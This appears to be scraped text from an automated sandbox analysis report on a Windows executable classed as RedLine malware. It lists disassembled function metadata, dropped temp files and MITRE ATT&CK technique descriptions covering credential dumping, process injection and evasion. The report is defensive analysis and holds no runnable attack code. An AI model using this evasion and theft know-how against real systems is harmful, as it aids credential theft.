Instruction Fuzzy Hash: 58E02631411D10FBCA0DB71CFA58AAC33D1BB18321B92016BE1028F2D19B7068858684

Function 0021D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0021D220

Strings

%.3d, xrefs: 0021D22B
X64, xrefs: 0021D2A8

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: f902001ef852bb6f00f7a71d072b5d6ff3a4b31bdf6784bbd94e24f9fd02cd5f
Instruction ID: 455a65b7b09d139f9cbffdae7ee9605f9297248a6645bbe496c2fbcf680f5a3f
Opcode Fuzzy Hash: f902001ef852bb6f00f7a71d072b5d6ff3a4b31bdf6784bbd94e24f9fd02cd5f
Instruction Fuzzy Hash: 6AD01265829218E9CB5096D0DC899FAB3FCEB29301F608453FC16D1041E774D5A86761

Function 00252322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0025232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0025233F

Part of subcall function 0022E97B: Sleep.KERNEL32 ref: 0022E9F3

Strings

Shell_TrayWnd, xrefs: 00252325

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: e0f9fe08f24fd72939e4f985230fa68ace5499fbbe0801882c448a9df7f7de91
Instruction ID: 2153ef8df358ae7d13b38511e23369bde09464e2e28ad043e23ae126d2097b54
Opcode Fuzzy Hash: e0f9fe08f24fd72939e4f985230fa68ace5499fbbe0801882c448a9df7f7de91
Instruction Fuzzy Hash: 6FD022763E0310BBE668B3B0FC1FFC6BA089B00B01F1009027305AA0D0E8F0A800CB48

Function 00252356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0025236C
PostMessageW.USER32(00000000), ref: 00252373

Part of subcall function 0022E97B: Sleep.KERNEL32 ref: 0022E9F3

Strings

Shell_TrayWnd, xrefs: 00252365

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: dfd9f33100c7ba2b97e6cd51e412d215c7076709b72803aaba82a1a0b14844a9
Instruction ID: 335ed4627409bfc2f69b1992f7accca40b2f1530eb41411e59fcd0d98c1afed0
Opcode Fuzzy Hash: dfd9f33100c7ba2b97e6cd51e412d215c7076709b72803aaba82a1a0b14844a9
Instruction Fuzzy Hash: 56D0A9723D13107AE668B3B0AC0FFC6A6089B00B01F5009027201AA0D0E8B0A8008A48

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report K3xL5Xy0XS.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

C:\Users\user\AppData\Local\Temp\aut516D.tmp

C:\Users\user\AppData\Local\Temp\obtenebrate

C:\Users\user\AppData\Local\Temp\tmp438F.tmp

C:\Users\user\AppData\Local\Temp\tmp439F.tmp

C:\Users\user\AppData\Local\Temp\tmp43A0.tmp

C:\Users\user\AppData\Local\Temp\tmp43C0.tmp

C:\Users\user\AppData\Local\Temp\tmp43D1.tmp

C:\Users\user\AppData\Local\Temp\tmp43D2.tmp

C:\Users\user\AppData\Local\Temp\tmp43E3.tmp

C:\Users\user\AppData\Local\Temp\tmp43E4.tmp

C:\Users\user\AppData\Local\Temp\tmp4404.tmp

C:\Users\user\AppData\Local\Temp\tmp4405.tmp

C:\Users\user\AppData\Local\Temp\tmp4406.tmp

Windows Analysis Report
K3xL5Xy0XS.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre